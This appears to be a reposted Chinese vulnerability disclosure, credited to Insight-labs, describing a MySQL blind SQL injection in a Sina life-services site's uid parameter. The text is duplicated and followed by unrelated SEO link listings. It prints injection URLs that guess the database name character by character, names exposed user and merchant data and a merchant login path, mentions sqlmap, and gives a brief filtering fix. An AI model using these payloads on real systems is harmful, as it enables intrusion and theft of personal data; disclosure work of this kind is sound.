新浪生活服务互动社区Mysql盲注漏洞的介绍及其修
网站建设 2023-02-09 11:10www.1681989.com免费网站
注入漏洞存在地址为
http://life.sa../act/cgi/mother/md?uid=1464029310
其中该漏洞可以导致数据泄漏,其中泄漏的数据包括团购,优惠券、以及用户联系方式,smslog,团购商户、adm等数据。
,团购的商户登陆地址为
http://life.sa../tuanadm
漏洞证明下面为手工猜解数据库名的语句为
http://life.sa../act/cgi/mother/md?uid=1464029310 and Length((database()))<5
http://life.sa../act/cgi/mother/md?uid=1464029310 and ascii(substrg((database()),1,1))=108
http://life.sa../act/cgi/mother/md?uid=1464029310 and ascii(substrg((database()),1,1))=105
http://life.sa../act/cgi/mother/md?uid=1464029310 and ascii(substrg((database()),1,1))=102
http://life.sa../act/cgi/mother/md?uid=1464029310 and ascii(substrg((database()),1,1))=101
下图为注入是返回对正确与错误的截图
注入返回对的情况截图
注入时返回错的情况截图
一下是使用sqlmap对注入点进行注入攻击,一下该例为查询数据库banner,通过改变命令参数可以对其进行更深入的攻击。
修复方案
对其uid参数进行检查并且进行过滤。
作者 Insight-labs
http://life.sa../act/cgi/mother/md?uid=1464029310
其中该漏洞可以导致数据泄漏,其中泄漏的数据包括团购,优惠券、以及用户联系方式,smslog,团购商户、adm等数据。
,团购的商户登陆地址为
http://life.sa../tuanadm
漏洞证明下面为手工猜解数据库名的语句为
http://life.sa../act/cgi/mother/md?uid=1464029310 and Length((database()))<5
http://life.sa../act/cgi/mother/md?uid=1464029310 and ascii(substrg((database()),1,1))=108
http://life.sa../act/cgi/mother/md?uid=1464029310 and ascii(substrg((database()),1,1))=105
http://life.sa../act/cgi/mother/md?uid=1464029310 and ascii(substrg((database()),1,1))=102
http://life.sa../act/cgi/mother/md?uid=1464029310 and ascii(substrg((database()),1,1))=101
下图为注入是返回对正确与错误的截图
注入返回对的情况截图
注入时返回错的情况截图
一下是使用sqlmap对注入点进行注入攻击,一下该例为查询数据库banner,通过改变命令参数可以对其进行更深入的攻击。
修复方案
对其uid参数进行检查并且进行过滤。
作者 Insight-labs
网站设计
- 静宁会SEO的网站建设公司:全面提升您的网络影
- 提升在线业务的关键:选择最佳的丽水网站建设
- 浙江网站优化发展潜力如何
- 井研专业的网站建设公司:打造您的在线品牌
- 灵山SEO网站建设公司:提升您的在线业务表现
- 蒙城网站建设优化公司:提升您网站表现的理想
- 阳谷企业网站优化:提升线上业务力的关键
- 樟树专业的网站建设公司:打造您在线业务的坚
- 通河百度SEO排名的策略与技巧
- 重庆百度快照排名如何进行精准的客户引流
- 重庆百度快照排名
- 常宁便宜的建站公司:助您轻松打造在线业务
- 巫溪百度网站优化:提升网站曝光率与流量的关
- 湖北整站优化怎么做才能放大客户需求
- 闸北网站建设多少钱?全面解析与预算规划
- 辽宁企业网站优化怎么做电话营销